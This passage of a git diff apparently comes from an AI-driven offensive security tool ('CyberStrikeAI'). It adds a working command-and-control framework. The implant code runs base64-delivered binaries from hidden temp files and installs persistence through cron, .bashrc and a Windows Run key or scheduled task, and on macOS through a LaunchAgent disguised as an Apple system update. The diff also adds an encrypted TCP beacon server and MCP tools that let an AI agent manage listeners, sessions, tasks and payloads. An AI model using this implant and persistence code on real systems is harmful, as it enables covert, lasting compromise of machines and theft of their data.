struct{}{} }() + go func() { io.Copy(conn, remote); done <- struct{}{} }() + <-done +} + +// --- Load Assembly (in-memory exec) --- + +func taskLoadAssembly(payload map[string]interface{}) (string, string, string, string) { + b64Data, _ := payload["data"].(string) + args, _ := payload["args"].(string) + + if b64Data == "" { + fileID, _ := payload["file_id"].(string) + if fileID == "" { + return "", "", "", "data (base64) or file_id required" + } + asm, err := fetchC2FileByID(fileID) + if err != nil { + return "", "", "", err.Error() + } + b64Data = base64.StdEncoding.EncodeToString(asm) + } + + data, err := base64.StdEncoding.DecodeString(b64Data) + if err != nil { + return "", "", "", "decode assembly: " + err.Error() + } + + tmpDir := os.TempDir() + tmpFile := filepath.Join(tmpDir, fmt.Sprintf(".cs_%d", time.Now().UnixNano())) + if runtime.GOOS == "windows" { + tmpFile += ".exe" + } + if err := os.WriteFile(tmpFile, data, 0700); err != nil { + return "", "", "", err.Error() + } + defer os.Remove(tmpFile) + + cmdArgs := []string{} + if args != "" { + cmdArgs = strings.Fields(args) + } + cmd := exec.Command(tmpFile, cmdArgs...) + cwdMu.Lock() + cmd.Dir = currentCwd + cwdMu.Unlock() + + out, err := cmd.CombinedOutput() + if err != nil { + return string(out), "", "", err.Error() + } + return string(out), "", "", "" +} + +// --- Persistence --- + +func taskPersist(payload map[string]interface{}) (string, string, string, string) { + method, _ := payload["method"].(string) + if method == "" { + method = "auto" + } + exe := exeSelf() + if exe == "" || exe == "unknown" { + return "", "", "", "cannot determine self path" + } + + switch runtime.GOOS { + case "linux": + return persistLinux(exe, method) + case "darwin": + return persistDarwin(exe, method) + case "windows": + return persistWindows(exe, method) + default: + return "", "", "", "persistence not supported on " + runtime.GOOS + } +} + +func persistLinux(exe, method string) (string, string, string, string) { + if method == "auto" || method == "cron" { + cronEntry := fmt.Sprintf("@reboot %s &\n", exe) + out, err := runWithTimeout(fmt.Sprintf("(crontab -l 2>/dev/null; echo '%s') | sort -u | crontab -", strings.TrimSpace(cronEntry)), 10) + if err == nil { + return "persistence installed via cron: " + out, "", "", "" + } + } + if method == "auto" || method == "bashrc" { + line := fmt.Sprintf("\n(nohup %s &>/dev/null &) # cs\n", exe) + home, _ := os.UserHomeDir() + if home != "" { + f, err := os.OpenFile(filepath.Join(home, ".bashrc"), os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0644) + if err == nil { + f.WriteString(line) + f.Close() + return "persistence installed via .bashrc", "", "", "" + } + } + } + return "", "", "", "persistence failed on linux" +} + +func persistDarwin(exe, method string) (string, string, string, string) { + if method == "auto" || method == "launchagent" { + home, _ := os.UserHomeDir() + if home == "" { + return "", "", "", "cannot determine home dir" + } + plistDir := filepath.Join(home, "Library", "LaunchAgents") + os.MkdirAll(plistDir, 0755) + plist := fmt.Sprintf(` + + + + Labelcom.apple.systemupdate + ProgramArguments%s + RunAtLoad + KeepAlive + StandardOutPath/dev/null + StandardErrorPath/dev/null + +`, exe) + plistPath := filepath.Join(plistDir, "com.apple.systemupdate.plist") + if err := os.WriteFile(plistPath, []byte(plist), 0644); err != nil { + return "", "", "", err.Error() + } + return "persistence installed via LaunchAgent: " + plistPath, "", "", "" + } + return "", "", "", "persistence method not supported on darwin" +} + +func persistWindows(exe, method string) (string, string, string, string) { + if method == "auto" || method == "registry" { + cmd := fmt.Sprintf(`reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SystemUpdate /t REG_SZ /d "%s" /f`, exe) + out, err := runWithTimeout(cmd, 10) + if err == nil { + return "persistence installed via registry Run key: " + out, "", "", "" + } + } + if method == "auto" || method == "schtasks" { + cmd := fmt.Sprintf(`schtasks /create /tn "SystemUpdate" /tr "%s" /sc onlogon /rl highest /f`, exe) + out, err := runWithTimeout(cmd, 10) + if err == nil { + return "persistence installed via schtasks: " + out, "", "", "" + } + } + return "", "", "", "persistence failed on windows" +} + +func getFloat(m map[string]interface{}, key string) float64 { + v, _ := m[key].(float64) + return v +} diff --git a/internal/c2/session_watchdog.go b/internal/c2/session_watchdog.go new file mode 100644 index 00000000..328f1f32 --- /dev/null +++ b/internal/c2/session_watchdog.go @@ -0,0 +1,109 @@ +package c2 + +import ( + "context" + "time" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// SessionWatchdog 会话心跳看门狗:周期扫描所有 active/sleeping 会话, +// 把超过 (sleep * (1 + jitter%) * graceFactor + minGrace) 仍未心跳的标为 dead。 +// +// 设计要点: +// - 单 goroutine + ticker,避免对每个会话开 timer,session 数量大时也线性 OK; +// - 阈值随会话自身 sleep/jitter 自适应(sleep=300s 的会话不能用 sleep=5s 的判定); +// - 全局最小宽限期 minGrace 避免 sleep 配置错误的会话被误判; +// - 不读 implant_uuid,纯按 last_check_in 字段,与 listener 类型解耦。 +type SessionWatchdog struct { + manager *Manager + logger *zap.Logger + interval time.Duration // 扫描周期,默认 15s + minGrace time.Duration // 最小宽限期,默认 30s + gracePct float64 // 心跳超时倍数,默认 3.0(即 3 倍 sleep 周期没心跳算掉线) + stopCh chan struct{} +} + +// NewSessionWatchdog 创建看门狗 +func NewSessionWatchdog(m *Manager) *SessionWatchdog { + return &SessionWatchdog{ + manager: m, + logger: m.Logger().With(zap.String("component", "c2-watchdog")), + interval: 15 * time.Second, + minGrace: 30 * time.Second, + gracePct: 3.0, + stopCh: make(chan struct{}), + } +} + +// Run 阻塞执行,直到 ctx.Done() 或 Stop() +func (w *SessionWatchdog) Run(ctx context.Context) { + t := time.NewTicker(w.interval) + defer t.Stop() + for { + select { + case <-ctx.Done(): + return + case <-w.stopCh: + return + case <-t.C: + w.tick() + } + } +} + +// Stop 停止 +func (w *SessionWatchdog) Stop() { + select { + case <-w.stopCh: + default: + close(w.stopCh) + } +} + +func (w *SessionWatchdog) tick() { + now := time.Now() + for _, status := range []string{string(SessionActive), string(SessionSleeping)} { + sessions, err := w.manager.DB().ListC2Sessions(database.ListC2SessionsFilter{Status: status}) + if err != nil { + w.logger.Warn("watchdog 列表查询失败", zap.Error(err)) + continue + } + for _, s := range sessions { + if w.isStale(s, now) { + if err := w.manager.MarkSessionDead(s.ID); err != nil { + w.logger.Warn("标记会话掉线失败", zap.String("session_id", s.ID), zap.Error(err)) + } + } + } + } +} + +// isStale 判断会话是否超时 +func (w *SessionWatchdog) isStale(s *database.C2Session, now time.Time) bool { + // 无心跳记录:以 first_seen_at 兜底 + last := s.LastCheckIn + if last.IsZero() { + last = s.FirstSeenAt + } + sleep := s.SleepSeconds + if sleep <= 0 { + // TCP reverse 模式 sleep=0 → 用最小宽限期判定 + return now.Sub(last) > w.minGrace*2 + } + jitter := s.JitterPercent + if jitter < 0 { + jitter = 0 + } + if jitter > 100 { + jitter = 100 + } + // 阈值 = sleep * (1 + jitter%) * gracePct,再加 minGrace 兜底 + expected := time.Duration(float64(sleep)*(1+float64(jitter)/100.0)*w.gracePct) * time.Second + if expected < w.minGrace { + expected = w.minGrace + } + return now.Sub(last) > expected +} diff --git a/internal/c2/tcp_beacon_server.go b/internal/c2/tcp_beacon_server.go new file mode 100644 index 00000000..63803b32 --- /dev/null +++ b/internal/c2/tcp_beacon_server.go @@ -0,0 +1,267 @@ +package c2 + +import ( + "bufio" + "crypto/subtle" + "encoding/base64" + "encoding/binary" + "encoding/json" + "fmt" + "io" + "net" + "os" + "path/filepath" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// tcpBeaconMagic 二进制 Beacon 在反向 TCP 连接建立后首先发送的 4 字节,用于与经典 shell 反弹区分。 +const tcpBeaconMagic = "CSB1" + +// tcpBeaconMaxFrame 单帧密文(base64 字符串)最大字节数,防止 OOM。 +const tcpBeaconMaxFrame = 64 << 20 + +func readTCPBeaconFrame(r *bufio.Reader) (cipherB64 string, err error) { + var n uint32 + if err = binary.Read(r, binary.BigEndian, &n); err != nil { + return "", err + } + if n == 0 || int64(n) > int64(tcpBeaconMaxFrame) { + return "", fmt.Errorf("invalid tcp beacon frame size") + } + buf := make([]byte, n) + if _, err = io.ReadFull(r, buf); err != nil { + return "", err + } + return string(buf), nil +} + +func writeTCPBeaconFrame(mu *sync.Mutex, conn net.Conn, cipherB64 string) error { + if mu != nil { + mu.Lock() + defer mu.Unlock() + } + payload := []byte(cipherB64) + if len(payload) > tcpBeaconMaxFrame { + return fmt.Errorf("frame too large") + } + var hdr [4]byte + binary.BigEndian.PutUint32(hdr[:], uint32(len(payload))) + if _, err := conn.Write(hdr[:]); err != nil { + return err + } + _, err := conn.Write(payload) + return err +} + +func tcpBeaconCheckToken(expected, got string) bool { + if got == "" || expected == "" { + return false + } + return subtle.ConstantTimeCompare([]byte(got), []byte(expected)) == 1 +} + +// handleTCPBeaconSession 处理已消费魔数 CSB1 之后的 TCP Beacon 会话(与 HTTP Beacon 相同的 AES-GCM + JSON 语义)。 +func (l *TCPReverseListener) handleTCPBeaconSession(conn net.Conn, br *bufio.Reader) { + var writeMu sync.Mutex + defer func() { + _ = conn.Close() + }() + + for { + _ = conn.SetReadDeadline(time.Now().Add(6 * time.Minute)) + cipherB64, err := readTCPBeaconFrame(br) + if err != nil { + if err != io.EOF && !isClosedConnErr(err) { + l.logger.Debug("tcp beacon read frame", zap.Error(err)) + } + return + } + plain, err := DecryptAESGCM(l.rec.EncryptionKey, cipherB64) + if err != nil { + l.logger.Warn("tcp beacon decrypt failed", zap.Error(err)) + return + } + + var env map[string]json.RawMessage + if err := json.Unmarshal(plain, &env); err != nil { + l.logger.Warn("tcp beacon json", zap.Error(err)) + return + } + opBytes, ok := env["op"] + if !ok { + return + } + var op string + if err := json.Unmarshal(opBytes, &op); err != nil { + return + } + var token string + if tb, ok := env["token"]; ok { + _ = json.Unmarshal(tb, &token) + } + if !tcpBeaconCheckToken(l.rec.ImplantToken, token) { + l.logger.Warn("tcp beacon bad token", zap.String("listener_id", l.rec.ID)) + return + } + + var resp interface{} + switch op { + case "check_in": + rawCheck, ok := env["check"] + if !ok { + return + } + var req ImplantCheckInRequest + if err := json.Unmarshal(rawCheck, &req); err != nil { + return + } + if req.UserAgent == "" { + req.UserAgent = "tcp_beacon" + } + if req.SleepSeconds <= 0 { + req.SleepSeconds = l.cfg.DefaultSleep + } + host, _, _ := net.SplitHostPort(conn.RemoteAddr().String()) + if req.Metadata == nil { + req.Metadata = map[string]interface{}{} + } + req.Metadata["transport"] = "tcp_beacon" + req.Metadata["remote"] = conn.RemoteAddr().String() + if strings.TrimSpace(req.InternalIP) == "" { + req.InternalIP = host + } + session, err := l.manager.IngestCheckIn(l.rec.ID, req) + if err != nil { + l.logger.Warn("tcp beacon check_in", zap.Error(err)) + return + } + queued, _ := l.manager.DB().ListC2Tasks(database.ListC2TasksFilter{ + SessionID: session.ID, + Status: string(TaskQueued), + Limit: 1, + }) + resp = ImplantCheckInResponse{ + SessionID: session.ID, + NextSleep: session.SleepSeconds, + NextJitter: session.JitterPercent, + HasTasks: len(queued) > 0, + ServerTime: NowUnixMillis(), + } + + case "tasks": + rawSID, ok := env["session_id"] + if !ok { + return + } + var sessionID string + if err := json.Unmarshal(rawSID, &sessionID); err != nil || sessionID == "" { + return + } + sess, err := l.manager.DB().GetC2Session(sessionID) + if err != nil || sess == nil || sess.ListenerID != l.rec.ID { + return + } + envelopes, err := l.manager.PopTasksForBeacon(sessionID, 50) + if err != nil { + return + } + if envelopes == nil { + envelopes = []TaskEnvelope{} + } + resp = map[string]interface{}{"tasks": envelopes} + + case "result": + raw, ok := env["result"] + if !ok { + return + } + var report TaskResultReport + if err := json.Unmarshal(raw, &report); err != nil { + return + } + if err := l.manager.IngestTaskResult(report); err != nil { + return + } + resp = map[string]string{"ok": "1"} + + case "upload": + raw, ok := env["upload"] + if !ok { + return + } + var up struct { + TaskID string `json:"task_id"` + DataB64 string `json:"data_b64"` + } + if err := json.Unmarshal(raw, &up); err != nil || up.TaskID == "" { + return + } + plainFile, err := base64.StdEncoding.DecodeString(up.DataB64) + if err != nil { + return + } + dir := filepath.Join(l.manager.StorageDir(), "uploads") + if err := os.MkdirAll(dir, 0o755); err != nil { + return + } + dst := filepath.Join(dir, up.TaskID+".bin") + if err := os.WriteFile(dst, plainFile, 0o644); err != nil { + return + } + resp = map[string]interface{}{"ok": 1, "size": len(plainFile)} + + case "file": + raw, ok := env["file"] + if !ok { + return + } + var fr struct { + FileID string `json:"file_id"` + } + if err := json.Unmarshal(raw, &fr); err != nil || fr.FileID == "" { + return + } + if strings.Contains(fr.FileID, "/") || strings.Contains(fr.FileID, "\\") || strings.Contains(fr.FileID, "..") { + return + } + fpath := filepath.Join(l.manager.StorageDir(), "downstream", fr.FileID+".bin") + absPath, err := filepath.Abs(fpath) + if err != nil { + return + } + absDir, err := filepath.Abs(filepath.Join(l.manager.StorageDir(), "downstream")) + if err != nil || !strings.HasPrefix(absPath, absDir+string(filepath.Separator)) { + return + } + data, err := os.ReadFile(absPath) + if err != nil { + return + } + resp = map[string]interface{}{ + "file_data": base64Encode(data), + } + + default: + return + } + + body, err := json.Marshal(resp) + if err != nil { + return + } + enc, err := EncryptAESGCM(l.rec.EncryptionKey, body) + if err != nil { + return + } + _ = conn.SetWriteDeadline(time.Now().Add(3 * time.Minute)) + if err := writeTCPBeaconFrame(&writeMu, conn, enc); err != nil { + return + } + } +} diff --git a/internal/c2/types.go b/internal/c2/types.go new file mode 100644 index 00000000..6025671b --- /dev/null +++ b/internal/c2/types.go @@ -0,0 +1,258 @@ +// Package c2 实现 CyberStrikeAI 内置 C2(Command & Control)框架。 +// +// 设计概述: +// - Manager 作为统一入口,被 internal/app 实例化并注入到所有需要操控 C2 的组件 +// (HTTP handler、MCP 工具、HITL 桥、攻击链记录器等)。 +// - Listener 是抽象接口,下挂 tcp_reverse / http_beacon / https_beacon / websocket +// 等不同传输方式的具体实现,全部通过 listener.Registry 工厂创建。 +// - 任务调度走数据库(c2_tasks 表)+ 内存事件总线(EventBus)混合: +// * 状态变化与历史记录靠 SQLite 实现持久化与重启恢复; +// * 高频实时通知(如新任务结果)通过 EventBus 推送给 SSE/WS 订阅者,避免轮询。 +// - Crypto 层固定 AES-256-GCM,每个 Listener 独立 32 字节密钥;密钥仅服务端持有 +// 和编译期注入到 implant,事件流不允许导出明文密钥。 +package c2 + +import ( + "errors" + "strings" + "time" +) + +// ListenerType 监听器类型,与 c2_listeners.type 字段一致 +type ListenerType string + +const ( + ListenerTypeTCPReverse ListenerType = "tcp_reverse" + ListenerTypeHTTPBeacon ListenerType = "http_beacon" + ListenerTypeHTTPSBeacon ListenerType = "https_beacon" + ListenerTypeWebSocket ListenerType = "websocket" +) + +// AllListenerTypes 列出所有受支持的监听器类型,便于校验与前端枚举 +func AllListenerTypes() []ListenerType { + return []ListenerType{ + ListenerTypeTCPReverse, + ListenerTypeHTTPBeacon, + ListenerTypeHTTPSBeacon, + ListenerTypeWebSocket, + } +} + +// IsValidListenerType 校验前端/MCP 入参是否为合法 type +func IsValidListenerType(t string) bool { + t = strings.ToLower(strings.TrimSpace(t)) + for _, lt := range AllListenerTypes() { + if string(lt) == t { + return true + } + } + return false +} + +// SessionStatus 与 c2_sessions.status 一致 +type SessionStatus string + +const ( + SessionActive SessionStatus = "active" + SessionSleeping SessionStatus = "sleeping" + SessionDead SessionStatus = "dead" + SessionKilled SessionStatus = "killed" +) + +// TaskStatus 与 c2_tasks.status 一致 +type TaskStatus string + +const ( + TaskQueued TaskStatus = "queued" + TaskSent TaskStatus = "sent" + TaskRunning TaskStatus = "running" + TaskSuccess TaskStatus = "success" + TaskFailed TaskStatus = "failed" + TaskCancelled TaskStatus = "cancelled" +) + +// TaskType 任务类型(与 beacon 端协商,避免硬编码字符串) +type TaskType string + +const ( + // 通用任务 + TaskTypeExec TaskType = "exec" // 执行任意命令(shell -c) + TaskTypeShell TaskType = "shell" // 交互式命令(保持 cwd) + TaskTypePwd TaskType = "pwd" // 当前目录 + TaskTypeCd TaskType = "cd" // 切目录 + TaskTypeLs TaskType = "ls" // 列目录 + TaskTypePs TaskType = "ps" // 列进程 + TaskTypeKillProc TaskType = "kill_proc" // 杀进程 + TaskTypeUpload TaskType = "upload" // 推文件到目标 + TaskTypeDownload TaskType = "download" // 拉文件回本机 + TaskTypeScreenshot TaskType = "screenshot" // 截图 + TaskTypeSleep TaskType = "sleep" // 调整心跳节律 + TaskTypeExit TaskType = "exit" // 让 implant 退出(不会自删二进制) + TaskTypeSelfDelete TaskType = "self_delete" // 退出 + 自删二进制(持久化清理) + // 高级任务 + TaskTypePortFwd TaskType = "port_fwd" + TaskTypeSocksStart TaskType = "socks_start" + TaskTypeSocksStop TaskType = "socks_stop" + TaskTypeLoadAssembly TaskType = "load_assembly" + TaskTypePersist TaskType = "persist" +) + +// AllTaskTypes 全部 task_type,便于工具 schema 列出 enum +func AllTaskTypes() []TaskType { + return []TaskType{ + TaskTypeExec, TaskTypeShell, + TaskTypePwd, TaskTypeCd, TaskTypeLs, TaskTypePs, TaskTypeKillProc, + TaskTypeUpload, TaskTypeDownload, TaskTypeScreenshot, + TaskTypeSleep, TaskTypeExit, TaskTypeSelfDelete, + TaskTypePortFwd, TaskTypeSocksStart, TaskTypeSocksStop, TaskTypeLoadAssembly, + TaskTypePersist, + } +} + +// IsDangerousTaskType 标记需要 HITL 二次确认的任务类型; +// 与 internal/handler/hitl.go 现有的 tool_whitelist 概念呼应:白名单外 → 走审批。 +func IsDangerousTaskType(t TaskType) bool { + switch t { + case TaskTypeKillProc, TaskTypeUpload, TaskTypeSelfDelete, + TaskTypePortFwd, TaskTypeSocksStart, TaskTypeLoadAssembly, TaskTypePersist: + return true + } + return false +} + +// ListenerConfig 解码后的监听器运行配置(来自 c2_listeners.config_json) +type ListenerConfig struct { + // HTTP/HTTPS Beacon 公共字段 + BeaconCheckInPath string `json:"beacon_check_in_path,omitempty"` // 默认 "/check_in" + BeaconTasksPath string `json:"beacon_tasks_path,omitempty"` // 默认 "/tasks" + BeaconResultPath string `json:"beacon_result_path,omitempty"` // 默认 "/result" + BeaconUploadPath string `json:"beacon_upload_path,omitempty"` // 默认 "/upload" + BeaconFilePath string `json:"beacon_file_path,omitempty"` // 默认 "/file/" + // HTTPS 专属 + TLSCertPath string `json:"tls_cert_path,omitempty"` + TLSKeyPath string `json:"tls_key_path,omitempty"` + TLSAutoSelfSign bool `json:"tls_auto_self_sign,omitempty"` // true:找不到证书时自动生成自签 + // 客户端默认参数(写到 c2_sessions 初值,beacon 也可在 check-in 时覆写) + DefaultSleep int `json:"default_sleep,omitempty"` // 秒,默认 5 + DefaultJitter int `json:"default_jitter,omitempty"` // 0-100,默认 0 + // OPSEC:可选命令黑名单(正则) + CommandDenyRegex []string `json:"command_deny_regex,omitempty"` + // 任务并发上限(每个会话同时下发的最大任务数,0 表示不限制) + MaxConcurrentTasks int `json:"max_concurrent_tasks,omitempty"` + // CallbackHost 植入端/Payload 使用的回连主机名(可选);与 bind_host 分离,便于 NAT/ECS 等场景 + CallbackHost string `json:"callback_host,omitempty"` +} + +// ApplyDefaults 对未填字段填默认值;调用方负责持久化时序列化新值 +func (c *ListenerConfig) ApplyDefaults() { + if strings.TrimSpace(c.BeaconCheckInPath) == "" { + c.BeaconCheckInPath = "/check_in" + } + if strings.TrimSpace(c.BeaconTasksPath) == "" { + c.BeaconTasksPath = "/tasks" + } + if strings.TrimSpace(c.BeaconResultPath) == "" { + c.BeaconResultPath = "/result" + } + if strings.TrimSpace(c.BeaconUploadPath) == "" { + c.BeaconUploadPath = "/upload" + } + if strings.TrimSpace(c.BeaconFilePath) == "" { + c.BeaconFilePath = "/file/" + } + if c.DefaultSleep <= 0 { + c.DefaultSleep = 5 + } + if c.DefaultJitter < 0 { + c.DefaultJitter = 0 + } + if c.DefaultJitter > 100 { + c.DefaultJitter = 100 + } +} + +// ImplantCheckInRequest beacon → 服务端的注册/心跳请求体(已解密后的明文) +type ImplantCheckInRequest struct { + ImplantUUID string `json:"uuid"` + Hostname string `json:"hostname"` + Username string `json:"username"` + OS string `json:"os"` + Arch string `json:"arch"` + PID int `json:"pid"` + ProcessName string `json:"process_name"` + IsAdmin bool `json:"is_admin"` + InternalIP string `json:"internal_ip"` + UserAgent string `json:"user_agent,omitempty"` + SleepSeconds int `json:"sleep_seconds"` + JitterPercent int `json:"jitter_percent"` + Metadata map[string]interface{} `json:"metadata,omitempty"` +} + +// ImplantCheckInResponse 服务端回执 +type ImplantCheckInResponse struct { + SessionID string `json:"session_id"` + NextSleep int `json:"next_sleep"` + NextJitter int `json:"next_jitter"` + HasTasks bool `json:"has_tasks"` + ServerTime int64 `json:"server_time"` +} + +// TaskEnvelope 服务端 → beacon 的任务派发载体 +type TaskEnvelope struct { + TaskID string `json:"task_id"` + TaskType string `json:"task_type"` + Payload map[string]interface{} `json:"payload"` +} + +// TaskResultReport beacon → 服务端的任务结果回传 +type TaskResultReport struct { + TaskID string `json:"task_id"` + Success bool `json:"success"` + Output string `json:"output,omitempty"` + Error string `json:"error,omitempty"` + BlobBase64 string `json:"blob_b64,omitempty"` // 如截图二进制 + BlobSuffix string `json:"blob_suffix,omitempty"` // 如 ".png" + StartedAt int64 `json:"started_at"` + EndedAt int64 `json:"ended_at"` +} + +// CommonError C2 模块统一错误类型,便于 handler 层映射 HTTP 状态码 +type CommonError struct { + Code string + Message string + HTTP int +} + +func (e *CommonError) Error() string { + if e == nil { + return "" + } + return e.Message +} + +// Sentinel errors,便于 errors.Is 比较 +var ( + ErrListenerNotFound = &CommonError{Code: "listener_not_found", Message: "监听器不存在", HTTP: 404} + ErrSessionNotFound = &CommonError{Code: "session_not_found", Message: "会话不存在", HTTP: 404} + ErrTaskNotFound = &CommonError{Code: "task_not_found", Message: "任务不存在", HTTP: 404} + ErrProfileNotFound = &CommonError{Code: "profile_not_found", Message: "Profile 不存在", HTTP: 404} + ErrInvalidInput = &CommonError{Code: "invalid_input", Message: "参数非法", HTTP: 400} + ErrAuthFailed = &CommonError{Code: "auth_failed", Message: "鉴权失败", HTTP: 401} + ErrPortInUse = &CommonError{Code: "port_in_use", Message: "端口已被占用", HTTP: 409} + ErrListenerRunning = &CommonError{Code: "listener_running", Message: "监听器已在运行", HTTP: 409} + ErrListenerStopped = &CommonError{Code: "listener_stopped", Message: "监听器未运行", HTTP: 409} + ErrUnsupportedType = &CommonError{Code: "unsupported_type", Message: "不支持的监听器类型", HTTP: 400} +) + +// SafeBindPort 校验端口范围 +func SafeBindPort(port int) error { + if port < 1 || port > 65535 { + return errors.New("port must be in 1..65535") + } + return nil +} + +// NowUnixMillis 统一时间戳工具 +func NowUnixMillis() int64 { + return time.Now().UnixNano() / int64(time.Millisecond) +} diff --git a/internal/mcp/builtin/constants.go b/internal/mcp/builtin/constants.go index 7e669ea1..29d2fad7 100644 --- a/internal/mcp/builtin/constants.go +++ b/internal/mcp/builtin/constants.go @@ -37,6 +37,16 @@ const ( ToolBatchTaskAdd = "batch_task_add_task" ToolBatchTaskUpdate = "batch_task_update_task" ToolBatchTaskRemove = "batch_task_remove_task" + + // C2 工具集(合并同类项,8 个统一工具) + ToolC2Listener = "c2_listener" // 监听器管理(create/start/stop/list/get/update/delete) + ToolC2Session = "c2_session" // 会话管理(list/get/set_sleep/kill/delete) + ToolC2Task = "c2_task" // 任务下发(统一 task_type 参数) + ToolC2TaskManage = "c2_task_manage" // 任务管理(get_result/wait/list/cancel) + ToolC2Payload = "c2_payload" // Payload 生成(oneliner/build) + ToolC2Event = "c2_event" // 事件查询 + ToolC2Profile = "c2_profile" // Malleable Profile 管理(list/get/create/update/delete) + ToolC2File = "c2_file" // 文件管理(list/get_result) ) // IsBuiltinTool 检查工具名称是否是内置工具 @@ -66,7 +76,16 @@ func IsBuiltinTool(toolName string) bool { ToolBatchTaskScheduleEnabled, ToolBatchTaskAdd, ToolBatchTaskUpdate, - ToolBatchTaskRemove: + ToolBatchTaskRemove, + // C2 工具 + ToolC2Listener, + ToolC2Session, + ToolC2Task, + ToolC2TaskManage, + ToolC2Payload, + ToolC2Event, + ToolC2Profile, + ToolC2File: return true default: return false @@ -101,5 +120,14 @@ func GetAllBuiltinTools() []string { ToolBatchTaskAdd, ToolBatchTaskUpdate, ToolBatchTaskRemove, + // C2 工具 + ToolC2Listener, + ToolC2Session, + ToolC2Task, + ToolC2TaskManage, + ToolC2Payload, + ToolC2Event, + ToolC2Profile, + ToolC2File, } } diff --git a/internal/security/executor.go b/internal/security/executor.go index 70e0dd52..4192b866 100644 --- a/internal/security/executor.go +++ b/internal/security/executor.go @@ -699,9 +699,9 @@ func (e *Executor) formatParamValue(param config.ParameterConfig, value interfac } } -// isBackgroundCommand 检测命令是否为完全后台命令(末尾有 & 符号,但不在引号内) -// 注意:command1 & command2 这种情况不算完全后台,因为command2会在前台执行 -func (e *Executor) isBackgroundCommand(command string) bool { +// IsBackgroundShellCommand 检测命令是否为完全后台命令(末尾有独立 &,且不在引号内)。 +// command1 & command2 不算完全后台(command2 仍在前台执行)。 +func IsBackgroundShellCommand(command string) bool { // 移除首尾空格 command = strings.TrimSpace(command) if command == "" { @@ -827,7 +827,7 @@ func (e *Executor) executeSystemCommand(ctx context.Context, args map[string]int } // 检测是否为后台命令(包含 & 符号,但不在引号内) - isBackground := e.isBackgroundCommand(command) + isBackground := IsBackgroundShellCommand(command) // 构建命令 var cmd *exec.Cmd @@ -852,9 +852,10 @@ func (e *Executor) executeSystemCommand(ctx context.Context, args map[string]int commandWithoutAmpersand := strings.TrimSuffix(strings.TrimSpace(command), "&") commandWithoutAmpersand = strings.TrimSpace(commandWithoutAmpersand) - // 构建新命令:command & pid=$!; echo $pid - // 使用变量保存PID,确保能获取到正确的后台进程PID - pidCommand := fmt.Sprintf("%s & pid=$!; echo $pid", commandWithoutAmpersand) + // 构建新命令:将用户命令置于独立重定向的后台作业,再 echo $pid。 + // 若子进程与 echo 共享同一 stdout 管道,且长时间不向 stdout 写入换行, + // bufio.ReadString('\n') 会永久阻塞(例如 beacon 持续写二进制/单行日志)。 + pidCommand := fmt.Sprintf("%s /dev/null 2>&1 & pid=$!; echo $pid", commandWithoutAmpersand) // 创建新命令来获取PID var pidCmd *exec.Cmd diff --git a/internal/security/executor_test.go b/internal/security/executor_test.go index 6286c5e7..91cde7c0 100644 --- a/internal/security/executor_test.go +++ b/internal/security/executor_test.go @@ -205,6 +205,29 @@ func TestExecutor_ExecuteInternalTool_NoStorage(t *testing.T) { } } +func TestExecuteSystemCommand_BackgroundDoesNotBlockOnChildStdout(t *testing.T) { + executor, _ := setupTestExecutor(t) + // 子进程先向 stdout 写无换行字符再长时间 sleep;若与 echo $pid 共享管道且未重定向子进程 stdout, + // ReadString('\n') 会阻塞到子进程退出。后台包装须将子进程标准流与 PID 行分离。 + ctx, cancel := context.WithTimeout(context.Background(), 4*time.Second) + defer cancel() + args := map[string]interface{}{ + "command": `(sh -c 'printf x; sleep 120') &`, + "shell": "sh", + } + res, err := executor.executeSystemCommand(ctx, args) + if err != nil { + t.Fatalf("executeSystemCommand: %v", err) + } + if res == nil || res.IsError { + t.Fatalf("expected success, got %+v", res) + } + txt := res.Content[0].Text + if !strings.Contains(txt, "后台命令已启动") { + t.Fatalf("unexpected body: %q", txt) + } +} + func TestPaginateLines(t *testing.T) { lines := []string{"Line 1", "Line 2", "Line 3", "Line 4", "Line 5"}